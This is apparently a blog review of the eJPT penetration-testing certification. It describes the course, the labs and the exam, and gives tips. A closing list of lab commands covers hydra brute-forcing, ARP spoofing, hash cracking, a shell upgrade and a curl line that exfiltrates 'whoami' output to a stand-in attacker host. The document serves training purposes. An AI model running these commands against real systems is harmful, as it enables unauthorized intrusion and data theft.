eLearnSecurity Junior Penetration Tester (eJPT) review


Context

A few months ago, I decided to change jobs to focus more on pentesting and offensive activities, although I had never done it before. I thus decided to obtain at least one certification in that domain to put on my CV. After going through the jungle of the certification business and its organisations, I found eLearnSecurity eJPT to fit my requirements, which were: practical knowledge course and exam, recognized on the market and cheap.

A week ago, I obtained the eJPT certification from eLearnSecurity with a score of 90% (18/20 questions). I thus decided (like a lot of people) to give a review of that certification for others like me who are looking for feedback.

The following lines are subjective and I invite anyone reading them to also read other opinions on the certification to get a good picture of it.

Format

The certification course is FREE: it is necessary to sign in to INE for a starter pass, and you then have access to the Penetration Testing Student (PTS) course at no charge. What costs money is the certification voucher (if you want to pass it) and it is $200.

For this kind of money and compared to the prices of other professional certifications, it is the best low-budget quality/price ratio you can find on this market. Moreover, if your objective is just to learn, well, it costs you zero to just sign in for the course and not take the exam.

Once you connect to the INE website you have access to PTS materials, divided into:

  • slides
  • videos
  • practical labs

Course

I found the information in the course very accurate. The slides are clear and straight to the point. The videos are a repetition of concepts seen in the slides; they demonstrate them and contain some tips that are not in the slides. The labs are practical exercises on concepts seen both in slides and videos. That really is the plus of this course: you get your hands inside the motor and really understand the concepts you just read about.

The course is designed for beginners and divided into three parts:

  • Penetration testing prerequisites
  • Penetration testing: preliminary skills and programming
  • Penetration testing basics

The first one is more or less a course on basic cryptography, network and web concepts. The second is a course on basic programming in C++, Python and shell scripting. Coming from an IT engineering background and having worked as a developer and a security engineer in blue teams, from these two I learnt close to zero but still went through them, and I have to say they explain well.

The third part was more relevant for my situation. It teaches you basic methodology of how to conduct a pentest using common industry standard tools such as nmap, nessus, metasploit, dirb/dirbuster, sqlmap etc. The outline of the course is made as if it was a pentest, so it starts with reconnaissance, then vulnerability assessment etc. I really appreciated that, because doing CTFs like I do is one thing, a professional penetration tester's job is really another. That is what I lacked the most: method.

For CTF amateurs out there that would like to pass it, I recommend changing your mindset when taking the course and the exam. Being root is the beginning; finding all vulnerabilities and weaknesses of a machine when you become root is the actual goal. It will still help to have done CTFs though.

It is also pretty up to date at the moment of writing these lines. The only obsolete part I could recall was:

  • The Burp Suite version: the free edition no longer includes the “spider” feature and so I had to download an older release; you can find it easily on Burp’s website download page

Of course, I recommend setting up a Kali Linux environment to do the course and the exam.

Blackbox labs

At the end of the course, you can access three black-box laboratories. Each one contains one or more LANs of virtual machines where you have to practice the skills learnt in the course and even more.

This is, in my humble opinion, the most realistic part of the course and what really improved my vision of pentesting.

To give you an idea of difficulty (if that is even possible), I did almost all the first black-box lab with no help (had one machine I could not root). The second I struggled a lot and had to go to solutions more than once. The third one I almost did myself, with only one detail I had to ask help on.

I strongly recommend looking at solutions only when stuck for more than a few hours. This is highly instructive on your own capacity to focus and keep calm.

I do not want to spoil these laboratories so the rest you will have to find by yourselves.

Exam

The exam is to conduct a penetration test according to a letter of engagement received from a client.

The exam lasts 72 hours. You get evaluated on a 20-question multiple-choice quiz. The time allowed is more than enough so I will say what everyone says about it: relax, it is no problem if you struggle with one machine, take the following one and come back later to the first.

Once the quiz is submitted, you know directly if you passed or not. No waiting times.

I suggest the following when taking the exam:

  • Have your notes from the course ready to be used
  • Write down what you always forget to do when you did the labs or the black-boxes in a checklist
  • Read the letter of engagement more than once
  • Complete the quiz “as-you-go” on the penetration test, come back to it when you think you have found an answer
  • Write down everything, including output of commands
  • Have food ready in your fridge :D

It took me around 9 hours to complete the exam. I passed with 18/20 (90%) and I am sure of one question I am wrong on, the second one, I have doubts but there is no feedback so I probably will never know.

A few commands

Some commands that I found very useful when doing the labs:

“Full” but quick nmap scan:

nmap -oN nmap_full -sV -T4 -n -p- <IP_range>

Hydra basic:

hydra -U <module_name>   # show help for a module
hydra -L users.txt -P pass.txt <proto>://<IP>:<PORT>

ARP spoofing:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target> -r <host>

“Upgrade” your shell to a TTY one:

bash -i
python -c 'import pty; pty.spawn("/bin/bash")'

MySQL connect to DB:

mysql -h <IP> -u <user> -P <port>

John the Ripper:

john --format=NT crackme.txt                  # NTLM hashes (Windows)
john --format=raw-md5 crackme.txt             # MySQL dump hashes
john --wordlist=<list> --rules crackme.txt    # mangling

Curl back a machine to prove a RCE:

curl http://attacker/`whoami | base64`

These are just a few examples. It is up to you to do your own list but maybe the above can give you ideas :).
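The nmap command above saves its results to nmap_full with -oN, and the exam tips call for writing down all command output. As an added example (not from the original post), this Python script turns that normal-format file into a per-host checklist of open services; the sample scan text, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of what `nmap -oN nmap_full -sV -T4 -n -p- <IP_range>`
# writes (documentation addresses, not output from a real scan).
SAMPLE = """\
# Nmap 7.91 scan initiated as: nmap -oN nmap_full -sV -T4 -n -p- 192.0.2.0/29
Nmap scan report for 192.0.2.2
Host is up (0.00042s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.60

Nmap scan report for 192.0.2.5
Host is up (0.00051s latency).
Not shown: 65533 closed ports
PORT   STATE    SERVICE   VERSION
80/tcp open     http      Apache httpd 2.4.6
81/tcp filtered hosts2-ns
# Nmap done: 8 IP addresses (2 hosts up) scanned
"""

# With -n the report line carries only the IP address (assumption of this parser).
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_normal_output(text):
    """Return {host: [(port, proto, state, service, version), ...]}."""
    hosts = defaultdict(list)
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and current:
            port, proto, state, service, version = m.groups()
            hosts[current].append((int(port), proto, state, service, version.strip()))
    return dict(hosts)

def checklist(hosts):
    """One line per open port, ready to paste into the engagement notes."""
    return [f"[ ] {h} {p}/{proto} {svc} {ver}".rstrip()
            for h, ports in sorted(hosts.items())
            for p, proto, state, svc, ver in ports if state == "open"]

if __name__ == "__main__":
    print("\n".join(checklist(parse_normal_output(SAMPLE))))
```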

Conclusion

I recommend the course and the certification to anyone like me, with no certifications on the CV and looking for an affordable, entry-level one.

I am seriously considering taking more difficult courses from eLearnSecurity given the quality of the material they offer.

That’s all folks.
